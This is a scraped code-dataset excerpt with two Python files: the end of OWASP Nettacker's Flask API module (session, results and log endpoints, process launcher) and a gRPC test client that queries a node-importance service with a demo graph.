    return jsonify(_start_scan_config), 200
@app.route("/session/check", methods=["GET"])
def __session_check():
    """
    check the session if it's valid

    Returns:
        a JSON message if it's valid otherwise abort(401)
    """
    __api_key_check(app, flask_request, __language())
    msg = messages(__language(), "browser_session_valid")
    return jsonify(__structure(status="ok", msg=msg)), 200
@app.route("/session/set", methods=["GET"])
def __session_set():
    """
    set session on the browser

    Returns:
        200 HTTP response if session is valid and a set-cookie in the response if success otherwise abort(403)
    """
    __api_key_check(app, flask_request, __language())
    msg = messages(__language(), "browser_session_valid")
    res = make_response(jsonify(__structure(status="ok", msg=msg)))
    access_key = app.config["OWASP_NETTACKER_CONFIG"]["api_access_key"]
    res.set_cookie("key", value=access_key)
    return res
@app.route("/session/kill", methods=["GET"])
def __session_kill():
    """
    unset session on the browser

    Returns:
        a 200 HTTP response with set-cookie to "expired" to unset the cookie on the browser
    """
    msg = messages(__language(), "browser_session_killed")
    res = make_response(jsonify(__structure(status="ok", msg=msg)))
    res.set_cookie("key", value="expired")
    return res
@app.route("/results/get_list", methods=["GET"])
def __get_results():
    """
    get list of scan's results through the API

    Returns:
        an array of JSON scan's results if success otherwise abort(403)
    """
    __api_key_check(app, flask_request, __language())
    try:
        page = int(__get_value(flask_request, "page"))
    except (TypeError, ValueError):
        # missing or non-numeric "page" parameter: default to the first page.
        # (A bare except here also swallowed SystemExit/KeyboardInterrupt.)
        page = 1
    return jsonify(__select_results(__language(), page)), 200
@app.route("/results/get", methods=["GET"])
def __get_result_content():
    """
    get a result HTML/TEXT/JSON content

    Returns:
        content of the scan result
    """
    __api_key_check(app, flask_request, __language())
    try:
        # renamed from `id` to avoid shadowing the builtin
        scan_id = int(__get_value(flask_request, "id"))
    except (TypeError, ValueError):
        # missing or non-numeric "id" parameter
        return jsonify(__structure(status="error", msg="your scan id is not valid!")), 400
    return __get_result(__language(), scan_id)
@app.route("/logs/get_list", methods=["GET"])
def __get_last_host_logs():
    """
    get list of logs through the API

    Returns:
        an array of JSON logs if success otherwise abort(403)
    """
    __api_key_check(app, flask_request, __language())
    try:
        page = int(__get_value(flask_request, "page"))
    except (TypeError, ValueError):
        # missing or non-numeric "page" parameter: default to the first page
        page = 1
    return jsonify(__last_host_logs(__language(), page)), 200
@app.route("/logs/get_html", methods=["GET"])
def __get_logs_html():
    """
    get host's logs through the API in HTML type

    Returns:
        HTML report
    """
    __api_key_check(app, flask_request, __language())
    try:
        host = __get_value(flask_request, "host")
    except Exception:
        # narrowed from a bare except: that also swallowed SystemExit;
        # a missing "host" parameter falls back to an empty filter
        host = ""
    return make_response(__logs_to_report_html(host, __language()))
@app.route("/logs/get_json", methods=["GET"])
def __get_logs():
    """
    get host's logs through the API in JSON type

    Returns:
        an array with JSON events
    """
    __api_key_check(app, flask_request, __language())
    try:
        host = __get_value(flask_request, "host")
    except Exception:
        # narrowed from a bare except:; a missing "host" parameter
        # falls back to an empty filter
        host = ""
    return jsonify(__logs_to_report_json(host, __language())), 200
@app.route("/logs/search", methods=["GET"])
def ___go_for_search_logs():
    """
    search in all events

    Returns:
        an array with JSON events
    """
    __api_key_check(app, flask_request, __language())
    try:
        page = int(__get_value(flask_request, "page"))
    except (TypeError, ValueError):
        # missing or non-numeric "page" parameter: default to the first page
        page = 1
    try:
        query = __get_value(flask_request, "q")
    except Exception:
        # narrowed from a bare except:; missing "q" means "match everything"
        query = ""
    return jsonify(__search_logs(__language(), page, query)), 200
def __process_it(api_host, api_port, api_debug_mode, api_access_key, api_client_white_list,
                 api_client_white_list_ips, api_access_log, api_access_log_filename, language):
    """
    a function to run flask in a subprocess to make kill signal in a better way!

    Args:
        api_host: host/IP to bind address
        api_port: bind port
        api_debug_mode: debug mode flag
        api_access_key: API access key
        api_client_white_list: clients white list flag
        api_client_white_list_ips: clients white list IPs
        api_access_log: access log flag
        api_access_log_filename: access log filename
        language: language
    """
    # Stash the runtime configuration where the request handlers expect it.
    app.config["OWASP_NETTACKER_CONFIG"] = {
        "api_access_key": api_access_key,
        "api_client_white_list": api_client_white_list,
        "api_client_white_list_ips": api_client_white_list_ips,
        "api_access_log": api_access_log,
        "api_access_log_filename": api_access_log_filename,
        "language": language
    }
    # threaded=True lets Flask serve concurrent requests in this subprocess.
    app.run(host=api_host, port=api_port, debug=api_debug_mode, threaded=True)
def _start_api(api_host, api_port, api_debug_mode, api_access_key, api_client_white_list,
               api_client_white_list_ips, api_access_log, api_access_log_filename, language):
    """
    entry point to run the API through the flask

    Args:
        api_host: host/IP to bind address
        api_port: bind port
        api_debug_mode: debug mode
        api_access_key: API access key
        api_client_white_list: clients white list flag
        api_client_white_list_ips: clients white list IPs
        api_access_log: access log flag
        api_access_log_filename: access log filename
        language: language
    """
    # Starting the API
    write_to_api_console(messages(language, "API_key").format(api_access_key))
    p = multiprocessing.Process(target=__process_it,
                                args=(api_host, api_port, api_debug_mode, api_access_key, api_client_white_list,
                                      api_client_white_list_ips, api_access_log, api_access_log_filename, language))
    p.start()
    # Flask can take a while to honour CTRL+C, so poll the child process and
    # translate KeyboardInterrupt into an explicit terminate().
    while True:
        try:
            # BUG FIX: this previously read `len(...) is not 0`, comparing
            # object identity with an int literal (undefined behaviour and a
            # SyntaxWarning on Python >= 3.8); test emptiness directly.
            if not multiprocessing.active_children():
                break
            time.sleep(0.3)
        except KeyboardInterrupt:
            for process in multiprocessing.active_children():
                process.terminate()
            break
    __die_success()
|
snet_test_client.py | # Tested on python3.6
import logging
import multiprocessing as mp
import grpc
import pem
import time
import datetime
from service_spec_node_importance import network_analytics_node_importance_pb2
from service_spec_node_importance import network_analytics_node_importance_pb2_grpc
import subprocess
import yaml
def multi_pro_sample():
    """Smoke test for multiprocessing: run f() in 4 processes, print results."""
    output = mp.Queue()
    # NOTE: f must be a picklable top-level function for mp.Process to work
    # on spawn-based platforms (Windows/macOS).
    processes = [mp.Process(target=f, args=[output]) for x in range(4)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()
    results = [output.get() for p in processes]
    print(results)
def f(output):
    """Demo worker: print a marker and push a sentinel result onto *output*."""
    marker, sentinel = 3, 4
    print(marker)
    output.put(sentinel)
def multi_pro(num_requests):
    """Fire *num_requests* concurrent CentralNodes requests and summarize.

    Prints the list of (status, message) tuples collected from the workers
    and a "<successes> / <total>" tally.
    """
    output = mp.Queue()
    # BUG FIX: the original passed target=find_central_nodes(output), which
    # called the function immediately in the parent process and handed its
    # return value (None) to Process — so the "workers" did nothing and the
    # requests ran sequentially.  Pass the callable itself instead.
    processes = [mp.Process(target=find_central_nodes, args=[output]) for x in range(num_requests)]
    for p in processes:
        p.start()
    for p in processes:
        p.join()
    results = [output.get() for p in processes]
    print(results)
    summed = sum([t[0] for t in results])
    print(summed, '/', len(results))
def find_central_nodes(output):
    """Call the remote CentralNodes gRPC service with a fixed demo graph.

    Puts (1, response_message) on *output* on success, or (0, error_string)
    on any failure, so the caller can tally successes.
    """
    try:
        channel = grpc.insecure_channel('tz-services-1.snet.sh:2234')
        # channel = grpc.insecure_channel('localhost:5001')
        stub = network_analytics_node_importance_pb2_grpc.NetworkAnalyticsNodeImportanceStub(channel)
        # Small hard-coded 8-node test graph.
        graph = {
            "nodes": ['1', '2', '3', '4', '5', '6', '7', '8'],
            "edges": [['1', '2'], ['1', '4'], ['2', '3'], ['2', '5'], ['3', '4'], ['3', '6'], ['2', '7'], ['3', '8']],
            "weights": [3, 4, 5, 6, 7, 8, 9, 10]
        }
        # NOTE(review): "weights" is built but never sent in the request —
        # presumably the service accepts unweighted graphs here; confirm
        # against the .proto definition.
        edges_req = []
        for e in graph["edges"]:
            edges_req.append(network_analytics_node_importance_pb2.Edge(edge=e))
        graph_in = network_analytics_node_importance_pb2.Graph(nodes=graph["nodes"], edges=edges_req)
        center_req = network_analytics_node_importance_pb2.CentralNodeRequest(graph=graph_in)
        resp = stub.CentralNodes(center_req)
        output.put((1, resp.message))
    except Exception as e:
        output.put((0, str(e)))
if __name__ == '__main__':
    # Time a single request round-trip through multi_pro.
    start_time = time.time()
    multi_pro(1)
    # find_central_nodes()
    end_time = time.time()
    # Report wall-clock duration in both units.
    print('Testing took ' + str(((end_time - start_time))) + ' seconds.')
    print('Testing took ' + str(((end_time - start_time) / 60)) + ' minutes.')
    pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.